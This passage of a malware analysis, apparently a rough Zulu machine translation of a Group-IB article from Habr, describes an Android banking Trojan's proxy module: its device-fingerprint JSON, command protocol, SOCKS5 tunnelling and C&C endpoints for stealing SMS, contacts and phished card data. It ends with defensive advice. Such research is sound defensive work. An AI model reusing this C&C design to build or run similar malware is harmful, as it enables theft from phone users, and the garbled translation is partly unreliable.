3. Ivula isigaba sokucubungula umyalo wemojula ye-Proxy, kuqala ngokungena umugqa mainLog("iseva yokuqala") и
Iseva::start() host[<%proxy_cnc%>], commandPort[<%command_port%>], i-proxyPort[<%proxy_port%>]
kuphi i-proxy_cnc, imbobo_ye-command kanye ne-proxy_port – amapharamitha atholwe ekucushweni kweseva elibamba.
Isigaba sokucubungula umyalo sibizwa I-CommandConnection. Ngokushesha ngemva kokuqala, yenza lezi zenzo ezilandelayo:
4. Ixhuma ku I-ProxyConfigClass.host: I-ProxyConfigClass.commandPort futhi ithumela idatha mayelana nedivayisi enegciwane lapho ngefomethi ye-JSON:
{
"id":<%id%>,
"imei":<%imei%>,
"imsi":<%imsi%>,
"model":<%model%>,
"manufacturer":<%manufacturer%>,
"androidVersion":<%androidVersion%>,
"country":<%country%>,
"partnerId":<%partnerId%>,
"packageName":<%packageName%>,
"networkType":<%networkType%>,
"hasGsmSupport":<%hasGsmSupport%>,
"simReady":<%simReady%>,
"simCountry":<%simCountry%>,
"networkOperator":<%networkOperator%>,
"simOperator":<%simOperator%>,
"version":<%version%>
}Kuphi:
- id – inkomba, izama ukuthola inani ngenkambu ethi “id” efayelini Elithandwayo Ngokuhlanganyela eliqanjwe ngokuthi “x”. Uma leli nani lingatholakalanga, likhiqiza elisha. Ngakho, imojula ye-Proxy inesihlonzi sayo, esikhiqizwa ngokufanayo ne-Bot ID.
- imei — IMEI yedivayisi. Uma kwenzeke iphutha phakathi nenqubo yokuthola inani, umlayezo wombhalo wephutha uzobhalwa esikhundleni sale nkambu.
- imsi — International Mobile Subscriber Identity of the device. Uma kwenzeke iphutha phakathi nenqubo yokuthola inani, umlayezo wombhalo wephutha uzobhalwa esikhundleni sale nkambu.
- imodeli - Igama elibonakalayo lomsebenzisi wokugcina lomkhiqizo wokugcina.
- umkhiqizi — Umkhiqizi womkhiqizo/i-hardware (Yakha.MANUFACTURER).
- androidVersion - iyunithi yezinhlamvu ngefomethi ethi "<%release_version%> (<%os_version%),<%sdk_version%>"
- country — indawo yamanje yocingo.
- I-partnerId iyiyunithi yezinhlamvu engenalutho.
- packageName – igama lephakheji.
- networkType — uhlobo loxhumano lwenethiwekhi lwamanje (isibonelo: “WIFI”, “MOBILE”). Uma kwenzeka iphutha, ibuyisela i-null.
- hasGsmSupport – iqiniso – uma ifoni isekela i-GSM, kungenjalo amanga.
- simReady – isimo seSIM khadi.
- simCountry - Ikhodi yezwe ye-ISO (ngokusekelwe kumhlinzeki wekhadi le-SIM).
- networkOperator — igama lika-opharetha. Uma kwenzeke iphutha phakathi nenqubo yokuthola inani, umlayezo wombhalo wephutha uzobhalwa esikhundleni sale nkambu.
- simOperator — Igama Lomhlinzeki Wesevisi (SPN). Uma kwenzeke iphutha phakathi nenqubo yokuthola inani, umlayezo wombhalo wephutha uzobhalwa esikhundleni sale nkambu.
- inguqulo - le nkambu igcinwa ekilasini lokumisa; ezinguqulweni ezihloliwe ze-bot yayilingana no-“1.6”.
5. Ishintshela kumodi yokulinda imiyalo evela kuseva. Imiyalo evela kuseva iza ngefomethi:
- 0 offset - umyalo
- 1 offset - iseshiniId
- 2 offset - ubude
- 4 offset - idatha
Lapho umyalo ufika, uhlelo lokusebenza lungena:
mainLog("Inhlokweni { sessionId<%id%>], uhlobo[<%command%>], ubude[<%length%>] }")
Imiyalo elandelayo evela kuseva ingenzeka:
| Igama | Umyalo | Idatha | Incazelo |
|---|---|---|---|
| uxhumanoId | 0 | I-ID yokuxhumana | Dala uxhumano olusha |
| UKULALA | 3 | Isikhathi | Misa isikhashana imojuli yommeleli |
| PING_PONG | 4 | - | Thumela umlayezo we-PONG |
Umlayezo we-PONG uqukethe amabhayithi angu-4 futhi ubukeka kanjena: 0x04000000.
Lapho umyalo we-ConnectionId wamukelwa (ukwakha uxhumano olusha) I-CommandConnection idala isibonelo sekilasi I-ProxyConnection.
- Amakilasi amabili abamba iqhaza ekubambeni iqhaza: I-ProxyConnection и ekupheleni. Lapho udala ikilasi I-ProxyConnection ixhuma ekhelini I-ProxyConfigClass.host: I-ProxyConfigClass.proxyPort nokudlulisa into ye-JSON:
{
"id":<%connectionId%>
}Iphendula, iseva ithumela umlayezo we-SOCKS5 oqukethe ikheli leseva ekude lapho ukuxhumana kufanele kusungulwe khona. Ukusebenzisana nale seva kwenzeka ngeklasi ekupheleni. Ukusethwa koxhumano kungamelwa ngohlelo ngale ndlela elandelayo:
Ukusebenzisana kwenethiwekhi
Ukuze uvimbele ukuhlaziywa kwethrafikhi ngabahogela benethiwekhi, ukusebenzisana phakathi kweseva ye-CnC nohlelo lokusebenza kungavikelwa kusetshenziswa iphrothokholi ye-SSL. Yonke idatha edlulisiwe kusuka nakuya kuseva yethulwa ngefomethi ye-JSON. Isicelo senza izicelo ezilandelayo ngesikhathi sokusebenza:
- http://<%CnC%>/api/v1/set_state.php - umphumela wokwenziwa komyalo.
- http://<%CnC%>/api/v1/get.php — ukuthola umyalo.
- http://<%CnC%>/api/v1/load_sms.php — ukulanda imiyalezo ye-SMS ocingweni oluthelelekile.
- http://<%CnC%>/api/v1/load_ab.php — ukulayisha uhlu loxhumene nabo kusuka kudivayisi ethelelekile.
- http://<%CnC%>/api/v1/aevents.php - isicelo senziwa lapho kubuyekezwa amapharamitha atholakala kufayela elithandwayo.
- http://<%CnC%>/api/v1/set_card.php — ukulayisha idatha etholwe kusetshenziswa iwindi lobugebengu bokweba imininingwane ebucayi elizenza i-Google Play Market.
- http://<%CnC%>/api/v1/logs.php - ukulayisha idatha yelogi.
- http://<%CnC%>/api/v1/records.php - ukulayisha idatha etholwe ngamafasitela obugebengu bokweba imininingwane ebucayi.
- http://<%CnC%>/api/v1/set_error.php – isaziso sephutha elenzekile.
Izincomo
Ukuze kuvikelwe amakhasimende abo ekusongelweni kwamaTrojan eselula, izinkampani kufanele zisebenzise izixazululo ezibanzi ezibavumela ukuthi baqaphe futhi bavimbele umsebenzi omubi ngaphandle kokufaka isofthiwe eyengeziwe kumadivayisi omsebenzisi.
Ukwenza lokhu, izindlela zokusayina zokuthola amaTrojan eselula zidinga ukuqiniswa ngobuchwepheshe bokuhlaziya ukuziphatha kweklayenti kanye nohlelo ngokwalo. Ukuvikela kufanele futhi kubandakanye umsebenzi wokuhlonza idivayisi kusetshenziswa ubuchwepheshe bezigxivizo zeminwe zedijithali, okuzokwenza kube nokwenzeka ukuqonda lapho i-akhawunti isetshenziswa kusukela kudivayisi engavamile futhi isivele iwele ezandleni zomkhwabanisi.
Iphuzu elibaluleke kakhulu ukutholakala kokuhlaziywa kwesiteshi esiphambanayo, okuvumela izinkampani ukuthi zilawule ubungozi obungaveli ku-inthanethi kuphela, kodwa nasesiteshini seselula, ngokwesibonelo, ezicelweni zamabhange eselula, ukuthengiselana nge-cryptocurrencies nanoma yiziphi ezinye lapho. ukuthengiselana kungenziwa.ukwenziwa kwezimali.
Imithetho yokuphepha yabasebenzisi:
- ungafaki izinhlelo zokusebenza zedivayisi yeselula ene-Android OS kusuka kunoma iyiphi imithombo ngaphandle kwe-Google Play, unake ngokukhethekile amalungelo acelwe uhlelo lokusebenza;
- faka njalo izibuyekezo ze-Android OS;
- qaphela izandiso zamafayela alandiwe;
- ungavakasheli izinsiza ezisolisayo;
- Ungachofozi izixhumanisi ezitholwe emilayezweni ye-SMS.
Iyadlala Semyon Rogacheva, uchwepheshe omncane ocwaningweni lwe-malware e-Group-IB Computer Forensics Laboratory.
Source: www.habr.com